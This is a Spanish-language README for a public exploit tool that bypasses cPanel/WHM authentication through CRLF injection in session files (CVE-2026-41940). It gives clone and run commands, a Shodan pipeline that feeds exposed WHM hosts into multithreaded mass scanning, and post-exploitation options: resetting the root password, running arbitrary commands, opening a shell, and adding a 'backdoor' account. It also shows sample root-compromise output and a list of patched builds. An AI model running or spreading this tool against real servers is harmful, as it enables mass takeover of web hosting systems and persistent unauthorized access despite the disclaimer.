
cPanel y WHM: Omisión de autenticación mediante inyección CRLF en archivos de sesión
⚡ Root sin Autenticación – Inyección CRLF en Archivo de Sesión ⚡
“Un solo exploit para dominarlos a todos.”
┌─────────────────────────────────────────────────────────────┐
│ Etapa 1 ── Generar una cookie de sesión pre‑auth │
│ Etapa 2 ── Inyección CRLF vía cabecera `Authorization` │
│ Etapa 3 ── Disparar `do_token_denied` (raw → cache) │
│ Etapa 4 ── Verificar acceso root a WHM vía API JSON │
└─────────────────────────────────────────────────────────────┘
💥 Resultado – Acceso root completo a WHM, sin necesidad de credenciales.
Este proyecto se publica bajo la Licencia MIT – siéntete libre de usarlo, modificarlo y distribuirlo, pero no seas malvado 😈.
Consulta el archivo LICENSE para más detalles.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
Cero dependencias – solo la biblioteca estándar de Python 3.
No necesitaspip,virtualenvni nada de ese ruido.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
Una vez que hayas comprometido el sistema, puedes:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (terminal WHM completo)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
Configuración:
Objetivos : 1
Hilos : 10
Timeout : 15s
Acción : solo escaneo
[10:23:15] [SCAN] Iniciando cadena de exploit de 4 etapas... https://192.168.1.100:2087
[10:23:15] [INFO] Hostname canónico descubierto: server.example.com
[10:23:15] [STEP] Etapa 1/4 — Generando sesión preauth...
[10:23:16] [ OK] Etapa1: sesión preauth = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Etapa 2/4 — Inyección CRLF vía cabecera Authorization...
[10:23:17] [ OK] Etapa2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Etapa 3/4 — Disparando gadget do_token_denied (raw→cache)...
[10:23:18] [ OK] Etapa3: HTTP 401 — gadget do_token_denied disparado
[10:23:18] [STEP] Etapa 4/4 — Verificando acceso root a WHM...
[10:23:18] [INFO] Etapa4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMADO — ¡Acceso root a WHM! (v11.118.0.63 — CONFIRMADO vulnerable)
[10:23:18] [PWND] Token : /cpsess1234567890
[10:23:18] [PWND] Sesión : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] Versión : 11.118.0.63
[10:23:18] [PWND] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — Escaneo Completado
Tiempo: 3.2s · Objetivos: 1
1 OBJETIVO(S) VULNERABLE(S)
[*] Objetivo : https://192.168.1.100:2087
[*] Versión : 11.118.0.63
[*] Token : /cpsess1234567890
[*] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] Sesión : 9a7f8e3d2c1b0a9f
[*] Evidencia : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
Todas las versiones inferiores a estos builds son vulnerables.
0xgh057r3c0n – investigador de seguridad, ingeniero inverso y adicto al café.
GitHub | Twitter
Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos.
El acceso no autorizado a sistemas informáticos es ilegal. El autor y los colaboradores no son responsables de ningún uso indebido o daño causado por este software.
Úsalo de forma responsable y obtén siempre permiso primero.
🔥 Hackea el planeta, pero mantente legal. 🔥
| Flag | Descripción |
|---|
-u, --url | URL de un solo objetivo (p. ej. https://host:2087) |
-l, --list | Archivo con una URL por línea |
--hostname | Sobrescribir el Host canónico (auto‑descubierto) |
-t, --threads | Hilos (predeterminado: 10) |
--timeout | Tiempo de espera en segundos (predeterminado: 15) |
--rate-limit | Pausa entre objetivos (segundos) |
--action | Post‑explotación: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | Nueva contraseña de root (con --action passwd) |
--cmd | Comando del sistema (con --action cmd/exec) |
--new-user | Nuevo usuario de cPanel (con --action adduser) |
--new-domain | Nuevo dominio de cPanel (con --action adduser) |
-o, --output | Guardar resultados en JSON |
| Rama | Build Parcheado | Estado |
|---|
| 11.110 | 11.110.0.97 | 🛡️ Corregido |
| 11.118 | 11.118.0.63 | 🛡️ Corregido |
| 11.126 | 11.126.0.54 | 🛡️ Corregido |
| 11.132 | 11.132.0.29 | 🛡️ Corregido |
| 11.134 | 11.134.0.20 | 🛡️ Corregido |
| 11.136 | 11.136.0.5 | 🛡️ Corregido |